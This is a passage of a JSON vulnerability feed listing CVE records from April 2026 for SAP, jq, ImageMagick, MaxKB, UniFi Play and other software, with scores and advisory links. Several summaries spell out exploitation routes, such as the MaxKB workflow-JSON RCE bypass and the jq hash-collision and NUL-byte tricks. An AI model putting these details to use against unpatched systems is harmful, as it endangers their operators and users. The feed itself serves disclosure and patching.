2.8.0.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00044,"ranking_epss":0.13361,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/026a2d623e2aa5efa67c4834651e79d5d7cab1da","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-wf7p-3jq5-q52w","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-wf7p-3jq5-q52w"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34256","summary":"Due to a missing authorization check in SAP ERP and SAP S/4HANA (Private Cloud and On-Premise), an authenticated attacker could execute a particular ABAP report to overwrite any existing eight?character executable ABAP report without authorization. If the overwritten report is subsequently executed, the intended functionality could become unavailable. Successful exploitation impacts availability, with a limited impact on integrity confined to the affected report, while confidentiality remains unaffected.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10732,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3731908","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34257","summary":"Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10541,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3692004","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34261","summary":"Due to a missing authorization check in SAP Business Analytics and SAP Content Management, an authenticated user could make unauthorized calls to certain remote function modules, potentially accessing sensitive information beyond their intended permissions. This vulnerability affects confidentiality, with no impact on integrity and availability.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00023,"ranking_epss":0.06149,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3705094","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34069","summary":"nimiq/core-rs-albatross is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. In versions 1.2.2 and below, an unauthenticated p2p peer can cause the RequestMacroChain message handler task to panic. Sending a RequestMacroChain message where the first locator hash on the victim’s main chain is a micro block hash (not a macro block hash) causes said panic. The RequestMacroChain::handle handler selects the locator based only on \"is on main chain\", then calls get_macro_blocks() and panics via .unwrap() when the selected hash is not a macro block (BlockchainError::BlockIsNotMacro). This issue has been fixed in version 1.3.0.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11627,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/nimiq/core-rs-albatross/commit/ae6c1e92342e72f80fd12accbe66ee80dd6802ac","https://github.com/nimiq/core-rs-albatross/pull/3660","https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0","https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-48m6-486p-9j8p"],"published_time":"2026-04-14T00:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39417","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain an incomplete fix for CVE-2025-53928, where a Remote Code Execution vulnerability still exists in the MCP node of the workflow engine. MaxKB only restricts the referencing code path (loading MCP config from the database). The else branch, responsible for loading mcp_servers directly from user-supplied JSON remains completely unpatched. Since mcp_source is an optional field (required=False), an attacker can simply omit it or set it to any non-referencing value to bypass the fix. By calling the workflow creation API directly with a crafted JSON payload, an attacker can inject a complete MCP node configuration with stdio transport, arbitrary command, and args — achieving RCE when the workflow is triggered via chat. This issue has been fixed in version 2.8.0.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":0.0006,"ranking_epss":0.18582,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/50e96002ee5dca34c68d3d9333b64ea358c92304","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-pw52-326g-r5xj"],"published_time":"2026-04-14T00:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40164","summary":"jq is a command-line JSON processor. Before commit 0c7d133c3c7e37c00b6d46b658a02244fdd3c784, jq used MurmurHash3 with a hardcoded, publicly visible seed (0x432A9843) for all JSON object hash table operations, which allowed an attacker to precompute key collisions offline. By supplying a crafted JSON object (~100 KB) where all keys hashed to the same bucket, hash table lookups degraded from O(1) to O(n), turning any jq expression into an O(n²) operation and causing significant CPU exhaustion. This affected common jq use cases such as CI/CD pipelines, web services, and data processing scripts, and was far more practical to exploit than existing heap overflow issues since it required only a small payload. This issue has been patched in commit 0c7d133c3c7e37c00b6d46b658a02244fdd3c784.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10632,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/0c7d133c3c7e37c00b6d46b658a02244fdd3c784","https://github.com/jqlang/jq/security/advisories/GHSA-wwj8-gxm6-jc29"],"published_time":"2026-04-14T00:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27677","summary":"Due to missing authorization checks in the SAP S/4HANA OData Service (Manage Reference Equipment), an attacker could update and delete child entities via OData services without proper authorization. This vulnerability has a high impact on integrity, while confidentiality and availability are not impacted.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3715097","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27678","summary":"Due to missing authorization checks in the SAP S/4HANA backend OData Service (Manage Reference Structures), an attacker could update and delete child entities via exposed OData services without proper authorization. This vulnerability has a high impact on integrity, while confidentiality and availability are not impacted.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3715177","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27679","summary":"Due to missing authorization checks in the SAP S/4HANA frontend OData Service (Manage Reference Structures), an attacker could update and delete child entities via exposed OData services without proper authorization. This vulnerability has a high impact on integrity, while confidentiality and availability are not impacted.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3716767","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27681","summary":"Due to insufficient authorization checks in SAP Business Planning and Consolidation and SAP Business Warehouse, an authenticated user can execute crafted SQL statements to read, modify, and delete database data. This leads to a high impact on the confidentiality, integrity, and availability of the system.","cvss":9.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.9,"cvss_v4":null,"epss":0.00047,"ranking_epss":0.14458,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3719353","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27683","summary":"SAP BusinessObjects Business Intelligence application allows an authenticated attacker to inject malicious JavaScript payloads through crafted URLs. When a victim accesses the URL, the script executes in the user�s browser, potentially exposing restricted information. This results in a low impact on confidentiality with no impact on integrity and availability.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3698216","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33948","summary":"jq is a command-line JSON processor. Commits before 6374ae0bcdfe33a18eb0ae6db28493b1f34a0a5b contain a vulnerability where CLI input parsing allows validation bypass via embedded NUL bytes. When reading JSON from files or stdin, jq uses strlen() to determine buffer length instead of the actual byte count from fgets(), causing it to truncate input at the first NUL byte and parse only the preceding prefix. This enables an attacker to craft input with a benign JSON prefix before a NUL byte followed by malicious trailing data, where jq validates only the prefix as valid JSON while silently discarding the suffix. Workflows relying on jq to validate untrusted JSON before forwarding it to downstream consumers are susceptible to parser differential attacks, as those consumers may process the full input including the malicious trailing bytes. This issue has been patched by commit 6374ae0bcdfe33a18eb0ae6db28493b1f34a0a5b.","cvss":2.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.9,"epss":0.00097,"ranking_epss":0.26819,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/6374ae0bcdfe33a18eb0ae6db28493b1f34a0a5b","https://github.com/jqlang/jq/security/advisories/GHSA-32cx-cvvh-2wj9"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27672","summary":"The Material Master application does not enforce authorization checks for authenticated users when executing reports, resulting in the disclosure of sensitive information. This vulnerability has a low impact on confidentiality and does not affect integrity and availability of the system.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3703276","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27673","summary":"Due to a missing authorization check, SAP S/4HANA (Private Cloud and On-Premise) allows an authenticated user to delete files on the operating system and gain unauthorized control over file operations which could leads to no impact on Confidentiality, Low impact on Integrity and Availability of the application.","cvss":4.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.9,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08847,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3703813","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27674","summary":"Due to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim�s browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00054,"ranking_epss":0.16788,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3719397","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27675","summary":"SAP Landscape Transformation contains a vulnerability in an RFC-exposed function module that could allow a high privileged adversary to inject arbitrary ABAP code and operating system commands. Due to this, some information could be modified, but the attacker does not have control over kind or degree. This leads to a low impact on integrity, while confidentiality and availability are not impacted.","cvss":2.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.0,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07801,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3723097","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27676","summary":"Due to missing authorization checks in the SAP S/4HANA OData Service (Manage Technical Object Structures), an attacker could update and delete child entities via exposed OData services without proper authorization. This vulnerability results in a low impact on integrity, while confidentiality and availability are not impacted.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3711682","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24318","summary":"Due to an Insecure session management vulnerability in SAP Business Objects Business Intelligence Platform, an unauthenticated attacker could obtain valid session tokens and reuse them to gain unauthorized access to a victim�s session. If the application continues to accept previously issued tokens after authentication, the attacker could assume the victim�s authenticated context. This could allow the attacker to access or modify information within the victim�s session scope, impacting confidentiality and integrity, while availability remains unaffected.","cvss":4.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.2,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09772,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3702191","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0512","summary":"Due to a Cross-Site Scripting (XSS) vulnerability in the SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL, that if accessed by a victim, results in execution of malicious content within the victim's browser. This could allow the attacker to access and modify information, impacting the confidentiality and integrity of the application, while availability remains unaffected.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00069,"ranking_epss":0.21194,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3645228","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6203","summary":"The User Registration & Membership plugin for WordPress is vulnerable to Open Redirect in versions up to and including 5.1.4. This is due to insufficient validation of user-supplied URLs passed via the 'redirect_to_on_logout' GET parameter before redirecting users. The `redirect_to_on_logout` GET parameter is passed directly to WordPress's `wp_redirect()` function instead of the domain-restricted `wp_safe_redirect()`. While `esc_url_raw()` is applied to sanitize malformed URLs, it does not restrict the redirect destination to the local domain, allowing an attacker to craft a specially formed link that redirects users to potentially malicious external URLs after logout, which could be used to facilitate phishing attacks.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07341,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/user-registration/tags/5.1.4/includes/functions-ur-template.php#L39","https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/functions-ur-template.php#L39","https://www.wordfence.com/threat-intel/vulnerabilities/id/020bed37-9544-49b7-941d-3b7f509fdfdf?source=cve"],"published_time":"2026-04-13T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39956","summary":"jq is a command-line JSON processor. In commits after 69785bf77f86e2ea1b4a20ca86775916889e91c9, the _strindices builtin in jq's src/builtin.c passes its arguments directly to jv_string_indexes() without verifying they are strings, and jv_string_indexes() in src/jv.c relies solely on assert() checks that are stripped in release builds compiled with -DNDEBUG. This allows an attacker to crash jq trivially with input like _strindices(0), and by crafting a numeric value whose IEEE-754 bit pattern maps to a chosen pointer, achieve a controlled pointer dereference and limited memory read/probe primitive. Any deployment that evaluates untrusted jq filters against a release build is vulnerable. This issue has been patched in commit fdf8ef0f0810e3d365cdd5160de43db46f57ed03.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01846,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/fdf8ef0f0810e3d365cdd5160de43db46f57ed03","https://github.com/jqlang/jq/security/advisories/GHSA-6gc3-3g9p-xx28","https://github.com/jqlang/jq/security/advisories/GHSA-6gc3-3g9p-xx28"],"published_time":"2026-04-13T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39979","summary":"jq is a command-line JSON processor. In commits before 2f09060afab23fe9390cce7cb860b10416e1bf5f, the jv_parse_sized() API in libjq accepts a counted buffer with an explicit length parameter, but its error-handling path formats the input buffer using %s in jv_string_fmt(), which reads until a NUL terminator is found rather than respecting the caller-supplied length. This means that when malformed JSON is passed in a non-NUL-terminated buffer, the error construction logic performs an out-of-bounds read past the end of the buffer. The vulnerability is reachable by any libjq consumer calling jv_parse_sized() with untrusted input, and depending on memory layout, can result in memory disclosure or process termination. The issue has been patched in commit 2f09060afab23fe9390cce7cb860b10416e1bf5f.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00042,"ranking_epss":0.12712,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/2f09060afab23fe9390cce7cb860b10416e1bf5f","https://github.com/jqlang/jq/security/advisories/GHSA-2hhh-px8h-355p","https://github.com/jqlang/jq/security/advisories/GHSA-2hhh-px8h-355p"],"published_time":"2026-04-13T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5086","summary":"Crypt::SecretBuffer versions before 0.019 for Perl is suseceptible to timing attacks.\n\nFor example, if Crypt::SecretBuffer was used to store and compare plaintext passwords, then discrepencies in timing could be used to guess the secret password.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://metacpan.org/release/NERDVANA/Crypt-SecretBuffer-0.019/source/Changes","http://www.openwall.com/lists/oss-security/2026/04/13/12"],"published_time":"2026-04-13T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40312","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, an off by one error in the MSL decoder could result in a crash when a malicous MSL file is read. This issue has been fixed in version 7.1.2-19.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/2a06c7be3bba3326caf8b7a8d1fa2e0d4b88998d","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5xg3-585r-9jh5","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4786","summary":"Mitgation of CVE-2026-4519 was incomplete. If the URL contained \"%action\" the mitigation could be bypassed for certain browser types the \"webbrowser.open()\" API could have commands injected into the underlying shell. See CVE-2026-4519 for details.","cvss":7.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.0,"epss":0.0002,"ranking_epss":0.05328,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/c5767a72838a8dda9d6dc5d3558075b055c56bca","https://github.com/python/cpython/commit/d22922c8a7958353689dc4763dd72da2dea03fff","https://github.com/python/cpython/commit/f4654824ae0850ac87227fb270f9057477946769","https://github.com/python/cpython/issues/148169","https://github.com/python/cpython/pull/148170","https://mail.python.org/archives/list/security-announce@python.org/thread/JQDUNJVB4AQNTJECSUKOBDU3XCJIPSE5/"],"published_time":"2026-04-13T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6220","summary":"A vulnerability was identified in HummerRisk up to 1.5.0. This vulnerability affects the function ServerService.addServer of the file ServerService.java of the component Video File Download URL Handler. Such manipulation of the argument streamIp leads to server-side request forgery. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.","cvss":5.1,"cvss_version":4.0,"cvss_v2":5.8,"cvss_v3":4.7,"cvss_v4":5.1,"epss":0.00033,"ranking_epss":0.0941,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ccccccctiiiiiiii-lab/public_exp/issues/1","https://vuldb.com/submit/785855","https://vuldb.com/vuln/357141","https://vuldb.com/vuln/357141/cti"],"published_time":"2026-04-13T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6224","summary":"A security flaw has been discovered in nocobase plugin-workflow-javascript up to 2.0.23. This issue affects the function createSafeConsole of the file packages/plugins/@nocobase/plugin-workflow-javascript/src/server/Vm.js. Performing a manipulation results in sandbox issue. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00039,"ranking_epss":0.11624,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Pai-777/ai-cve/blob/main/docs/cve-drafts/nocobase-workflow-javascript-sandbox-escape.en.md","https://vuldb.com/submit/785881","https://vuldb.com/vuln/357142","https://vuldb.com/vuln/357142/cti"],"published_time":"2026-04-13T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33947","summary":"jq is a command-line JSON processor. In versions 1.8.1 and below, functions jv_setpath(), jv_getpath(), and delpaths_sorted() in jq's src/jv_aux.c use unbounded recursion whose depth is controlled by the length of a caller-supplied path array, with no depth limit enforced. An attacker can supply a JSON document containing a flat array of ~65,000 integers (~200 KB) that, when used as a path argument by a trusted jq filter, exhausts the C call stack and crashes the process with a segmentation fault (SIGSEGV). This bypass works because the existing MAX_PARSING_DEPTH (10,000) limit only protects the JSON parser, not runtime path operations where arrays can be programmatically constructed to arbitrary lengths. The impact is denial of service (unrecoverable crash) affecting any application or service that processes untrusted JSON input through jq's setpath, getpath, or delpaths builtins. This issue has been addressed in commit fb59f1491058d58bdc3e8dd28f1773d1ac690a1f.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02068,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/fb59f1491058d58bdc3e8dd28f1773d1ac690a1f","https://github.com/jqlang/jq/security/advisories/GHSA-xwrw-4f8h-rjvg","https://github.com/jqlang/jq/security/advisories/GHSA-xwrw-4f8h-rjvg"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34238","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, an integer overflow in the despeckle operation causes a heap buffer overflow on 32-bit builds that will result in an out of bounds write. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.1,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/bcd8519c70ecd9ebbc180920f2cf97b267d1f440","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-26qp-ffjh-2x4v","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40169","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, a crafted image could result in an out of bounds heap write when writing a yaml or json output, resulting in a crash. This issue has been fixed in version 7.1.2-19.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/f86452a8aea37bf2b4bd36127f836dcc5f138b38","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5592-p365-24xh","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40183","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, the JXL encoder has an heap write overflow when a user specifies that the image should be encoded as 16 bit floats. This issue has been fixed in version 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01569,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-jvgr-9ph5-m8v4","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40310","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. Versions below both 7.1.2-19 and 6.9.13-44, contain a heap out-of-bounds write in the JP2 encoder with when a user specifies an invalid sampling index. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/3d653bea2df085c728a1c8f775808e1e9249dff9","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pwg5-6jfc-crvh","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40311","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. Versions below 7.1.2-19 and 6.9.13-44 contain a heap use-after-free vulnerability that can cause a crash when reading and printing values from an invalid XMP profile. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00015,"ranking_epss":0.03181,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/5facfecf1abb3fed46a08f614dcc43d1e548e20d","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r83h-crwp-3vm7","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22563","summary":"A series of Improper Input Validation vulnerabilities could allow a Command Injection by a malicious actor with access to the UniFi Play network.\n \nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier)
\nUniFi Play Audio Port  (Version 1.0.24 and earlier)
 \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later
\nUpdate UniFi Play Audio Port  to Version 1.1.9 or later","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00083,"ranking_epss":0.24152,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22564","summary":"An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to enable SSH to make unauthorized changes to the system.
 \n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier)
\nUniFi Play Audio Port  (Version 1.0.24 and earlier)
 \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later
\nUpdate UniFi Play Audio Port  to Version 1.1.9 or later","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00015,"ranking_epss":0.02907,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22565","summary":"An Improper Input Validation vulnerability could allow a malicious actor with access to the UniFi Play network to cause the device to stop responding.
 \n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier)
\nUniFi Play Audio Port  (Version 1.0.24 and earlier)
 \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later
